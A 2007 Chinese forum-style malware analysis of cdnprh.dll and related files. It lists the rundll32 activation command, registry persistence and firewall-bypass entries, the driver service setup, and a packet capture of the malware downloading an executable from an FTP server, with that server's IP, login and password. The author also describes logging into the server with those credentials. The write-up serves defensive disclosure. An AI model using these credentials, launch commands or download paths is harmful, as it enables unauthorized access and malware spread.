WD1X.COM - 问答一下,轻松解决,电脑应用解决专家
主板显卡CPU内存显示器
硬盘维修显卡维修显示器维修
注册表系统命令DOS命令Win8
存储光存储鼠标键盘
内存维修打印机维修
WinXPWin7Win11Linux
硬件综合机箱电源散热器手机数码
主板维修CPU维修键盘鼠标维修
Word教程Excel教程PowerPointWPS
网络工具系统工具图像工具
数据库javascript服务器
PHP教程CSS教程XML教程

cdnprh.dll,nlfdxfirc.exe,kuyths00.sys,kuyths00.dll等病毒的分析处理

更新时间:2007-06-14 09:23 作者:dikex(六翼刺猬)点击:

运行"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start激活病毒后:

注册表改动:

添加:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hqghumeay         Type: REG_SZ, Length: 148, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\"C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start         Type: REG_SZ, Length: 204, Data: "C:\WINDOWS\system32\Rundll32.exe" "C:\WINDOWS\system32\cdnprh.dll",Start:*:Enabled:cdnprh.dll",Start
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions"         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile         Type: REG_DWORD, Length: 4, Data: 0

-----------------------------------------------

网络动作:

从网上下载一个exe文件到C:\windows\temp\nlfdxfirc.exe并运行之;

===============================================

nlfdxfirc.exe激活后:

文件改动:

创建:

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB
C:\WINDOWS\system32\kuyths00.dll
C:\WINDOWS\system32\drivers\kuyths00.sys

删除:

%Temp%\tmp93.CAB
%Temp%\tmp94.CAB

-----------------------------------------------

注册表改动:

添加:

HKLM\SYSTEM\ControlSet001\Services\kuyths00         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Type         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Start         Type: REG_DWORD, Length: 4, Data: 3
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ErrorControl         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\ImagePath         Type: REG_EXPAND_SZ, Length: 90, Data: \??\C:\WINDOWS\system32\drivers\kuyths00.sys
HKLM\SYSTEM\ControlSet001\Services\kuyths00\DisplayName         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security         Desired Access: Read/Write
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Security\Security         Type: REG_BINARY, Length: 168, Data: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\NextInstance         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Control\*NewlyCreated*         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Service         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Legacy         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ConfigFlags         Type: REG_DWORD, Length: 4, Data: 0
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\Class         Type: REG_SZ, Length: 26, Data: LegacyDriver
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\ClassGUID         Type: REG_SZ, Length: 78, Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_KUYTHS00\0000\DeviceDesc         Type: REG_SZ, Length: 18, Data: kuyths00
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum         Desired Access: All Access
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\0         Type: REG_SZ, Length: 52, Data: Root\LEGACY_KUYTHS00\0000
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\Count         Type: REG_DWORD, Length: 4, Data: 1
HKLM\SYSTEM\ControlSet001\Services\kuyths00\Enum\NextInstance         Type: REG_DWORD, Length: 4, Data: 1


-----------------------------------------------

其他:

这时调用cdnprh.dll的rundll32.exe写入了一个注册表信息,也就是昨天的那个乱码情形了:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\neojdsacml         Type: REG_SZ, Length: 148, Data: #D;]XJOEPXT]tztufn43]Svoemm43/fyf#!#D;]XJOEPXT]tztufn43]deoqsi/emm#-Tubsu

这个东西即使使用icesword查看也是乱码,估计加载时是靠那个驱动翻译为正常的信息;

===============================================

追寻它下载的那个exe文件的地址:

在查看抓的数据包时,没有直接看到exe文件的地址,但发现了下面的几个数据包:


220 Welcome to blah FTP service.

USER netserv3

韝?箹
331 Please specify the password.

PASS 43243wen9874

230 Login successful.

TYPE I

200 Switching to Binary mode.

PASV

200 Switching to Binary mode.


PASV

PASV

227 Entering Passive Mode (60,18,146,34,150,163)

?

?

SIZE /plug/179.exe

SIZE /plug/179.exe

213 19776

RETR /plug/179.exe

150 Opening BINARY mode data connection for /plug/179.exe (19776 bytes).

我靠,是一个FTP站点,而且需要账号和密码,根据数据包信息,打开小车的站点资源探测器,地址为ftp://60.18.146.34/,登陆的用户为netserv3,口令为43243wen9874;

回车,成功登陆上去了!里面有不少文件,打开了plug目录,发现了20个大小相近的exe文件,全部下载下来一看,所有的CRC32校验码都是不同的!又打开了plugback目录,再次发现了20个大小几乎一样的exe文件!据测试是和plug目录里面的一样的;

另外还有一些其他文件,迟些在慢慢研究;

===============================================

随便测试了几个,他们的动作和那个nlfdxfirc.exe如出一辙!用卡巴扫描了一下,一个也不报!看来是高手所为了!我想这个东西可能在未来几天内流行起来!各位警惕一下!

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
你可能感兴趣的内容